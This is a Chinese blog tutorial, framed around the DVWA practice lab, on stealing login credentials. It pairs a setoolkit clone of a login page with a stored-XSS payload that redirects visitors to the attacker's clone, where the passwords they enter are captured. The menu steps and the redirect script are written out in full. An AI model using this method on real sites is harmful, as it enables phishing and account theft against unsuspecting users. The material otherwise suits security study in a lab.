XSS漏洞利用/setookit制作克隆网站/看完必会

已于 2022-10-22 18:25:14 修改
阅读量701 收藏 2
点赞数 1
分类专栏: 渗透测试 Kali  XSS跨站脚本攻击 文章标签: xss 安全 web安全 网络安全
于 2022-10-11 19:38:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127252363
版权

目录

一、盗取用户信息的原理

二、setookit工具克隆网站(万能社工工具)

三、利用存储型XSS漏洞跳转到该克隆网站

四、获取用户的账号与密码

一、盗取用户信息的原理

克隆网站登陆页面,利用XSS设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。

某网站有存储型XSS漏洞,我们利用该漏洞,使访问该网站的用户都跳转到克隆的登陆网页,用户如果安全意识不强,则会输入账号密码登陆,从而账号和密码被我们存储。

二、setookit工具克隆网站(万能社工工具)

以DVWA为例子

我们要克隆这个页面

注意 !这里要用 ip:端口号/dvwa 进入这个页面,我们一会需要在kali里面对这个页面进行克隆,需要从外部访问

kali终端输入setookit回车,y,回车

按顺序选择1--》2--》 3--》2 进入站点克隆

接下来不用输入,直接回车,默认使用kali的ip地址

输入需要克隆页面的url

http://172.20.10.3:8090/dvwa/login.php

然后回车

这就克隆好啦,我们直接访问172.20.10.5

可以看到我们克隆好的网页

三、利用存储型XSS漏洞跳转到该克隆网站

我们做好了克隆网站,下面就是要让受害者访问这个网站啦,就比如说,我在在线的dvwa中练习XSS呢,正好点进了有漏洞的页面,同时该网页被其他同学利用,已经存在存储好的脚本,我访问的时候触发跳转到让我登陆,如果我是初学者或者是在学其他模块不小心点错了,不知道这个漏洞,那我很可能会再输入一遍账号密码,从而泄露出去。

第一步构建payload

<script>document.location="http://172.20.10.5/";</script>

 我们把这一行插入到dvwa存储型XSS例题low难度

这时候我们再次访问

 直接跳转到我们做到克隆网页上了

做完这种操作以后无论在那个浏览器上访问,什么时候访问,都会跳转到该界面

尝试登陆

输入正确的账号密码,login一下发现没有任何效果,因为只克隆了这一页,当然不会有效果啦

四、获取用户的账号与密码

但是!这里没有效果,kali里面有啊,我们回到kali

账号密码就已经泄露被黑客拿到了

白帽Chen_D
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
seo的不同阶段的表现和网站SE表现分析
朱海燕的博客日记
08-27 3060
seo完整流程 1.seo初级 网站SE表现分析 seo每页结果有10个 2.seo中级 关键字选取:给网站选择合适的关键词(竞争度,搜索量) 怎么样看搜索量Index.baidu.com,这个是百度指数,(将关键词的搜索量指数化的平台,指数不等于搜索量,通常指数越高搜索量越高,没有指数说明该词搜索量过低zhu) 关键字设置 设置在html中的合适的标签之中,通常设置在 <meta name="keywords" content="xxx"> <meta name.
一个简单的Web劫持(XSS漏洞)
JYLCG的博客
05-08 347
原文链接 本篇文章仅供参考学习,切勿用作非法用途 今天给大家带来我的另一个学习过程的分享,就是XSS漏洞的利用,还是原来的味道,先介绍一下这次XSS渗透的工具。 1:beef(用来植入勾子,且对网站进行控制) 2:OWASP_Broken_Web_Apps(靶子) 先给大家讲一下大概的思路吧,就是先启动Beef,将勾子ip(其实也就是Beef的ip)写成语句,然后将语句写入目标网站XSS漏...
[Kali渗透]-钓鱼执法
Toprogram的博客
09-02 152
setookit,即社会工程学工具集Social-Engineer Toolkit,是一个为社会工程设计的开源渗透测试框架。SET具有很多自定义攻击向量,可让你快速进行可信的攻击kali上自带可以直接使用,终端输入setookit
探秘SiteCopy:一款高效网站克隆工具
最新发布
gitblog_00014的博客
04-18 922
探秘SiteCopy:一款高效网站克隆工具 项目地址:https://gitcode.com/Threezh1/SiteCopy 在数字化时代,我们常常需要备份或者迁移网站数据,而手动操作不仅耗时而且易出错。为此,开源社区带来了一款名为SiteCopy的强大工具,它允许开发者和Web管理员快速、准确地复制整个网站,包括静态文件和数据库。 项目简介 SiteCopy是一个轻量级的命令行工具,由Git...
社会工程攻击——setoolkit使用(含错误解决)
m0_57069925的博客
06-08 8684
此文章可学习钓鱼网站生成的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社会工程学的代表应用。Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由Davi
iPhone SE 产品官网颜色切换(HTML+CSS+JS实现)
NJR10byh的博客
06-07 1287
令人惊艳的iPhone SE颜色转换页面 iPhone SE(中国大陆)- 官方网站 Apple 在前不久发布了iPhone SE(第二代),宣传页面的iPhone SE颜色转换部分令我久久不能忘怀,帅啊!!(给苹果打了广告QAQ) 上代码: HTML部分: <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>iPhone SE</title>
利用xss窃取信息学习笔记
weixin_50597969的博客
04-16 181
利用xss窃取信息学习笔记原理setoolkit工具克隆网站存储xss跳转克隆网站查看账号和密码 原理 克隆网站登陆页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。 setoolkit工具克隆网站 kali终端输入setoolkit 接着输入y 出现???? 接着依次选择1,2,3,2 接着直接回车 输入目标url即可 然后访问那个url,转到dvwa的登陆界面 存储xss跳转克隆网站 将????payload存储到存储型xss中 /
部署 宝塔 网站打不开 自动跳转se://error/
qq_31940095的博客
10-19 812
修改网站配置文件 ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; 注意:同一个服务器上每一个开通SSL的网站都要修改
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
xsstry:xss漏洞利用平台
06-10
**XSS漏洞利用平台——深入理解XSS与CSS在安全中的角色** XSS(Cross Site Scripting)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本。"xsstry"是一个用于XSS漏洞测试和利用的平台,...
网站克隆 简单方便
09-10
非常好用,轻松一步搞定一个网站!快来试试吧!
JSP使用过滤器防止Xss漏洞
10-17
Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
web后端-最好用的扒站仿站工具(网页克隆网页复制)
热门推荐
互联网知识分享
04-02 1万+
(5)OfflineExplorer可以同时开100个线程下载,界面清爽,可以通过曲线检测下载速度、CPU/硬盘/内存占用。可以方便的把网页转换成EXE或者CHM或者PDF或者MHT.它最大的缺点就是会闪退,就是下载的网站如果是特别大的话,就可可能卡死,目前可能是官方的bug,比如1G单位的网址可以会卡死。注意:如果有些网站有账户的话,可以先登入,然后在下载,如下案例图,但是有些复杂的登入网站是不能被下载的。(2)Teleport 可以算是最稳定的了,但还是古老,症结同上,只能10线程龟速下载。
mutillidae实战(2)-Add to blog存储型XSS漏洞利用
zhy的博客
09-03 4445
今天主要完成了对Add to blog页面的存储型XSS漏洞利用,利用其完成cookie窃取及利用、网页插入两个简单操作。另外在窃取cookie时,完成了服务器端asp文件的部署,并且在盗取cookie后利用插件完成了身份伪造登录。 难点主要在与服务器的搭建,在服务器搭建时,先是尝试了使用一个新加坡的vps进行cookie收集,但是因为ssh连接的问题始终没有成功,最后采用阿里云服务器成功部署。...
Httrack网站克隆工具
红队是青春
05-11 654
Httrack网站克隆工具
使用HTTrack克隆网站
永远是少年
06-18 1997
今天继续给大家介绍渗透测试相关知识,本文主要内容是使用HTTrack克隆网站。 一、HTTrack简介 二、HTTrack克隆实战 三、HTTrack效果检验
网站克隆工具webhttrack
ResumeProject的博客
08-23 2175
【代码】网站克隆工具webhttrack。
kali工具 -- setoolkit(克隆网站及利用)
weixin_41489908的博客
01-06 1万+
书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你。。。 今天给大家介绍一款克隆网站工具:setoolkit 一、环境:kali 2019.04 二、用法: 1、打开终端,输入setoolkit 2、选择Social-Engineering Attacks 3、选择Website Attack Vectors 4、选择Credential Harvester Attack M...
xss-vuln学习通关总结
08-24
XSS漏洞学习通关总结 个人总结类文档 在本次XSS漏洞学习中,我们学习到了XSS攻击的基本概念、产生原因以及不同的XSS漏洞类型。通过这次学习,对XSS漏洞有了更深入的了解,并且学会了如何预防和修复这些漏洞。 1、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值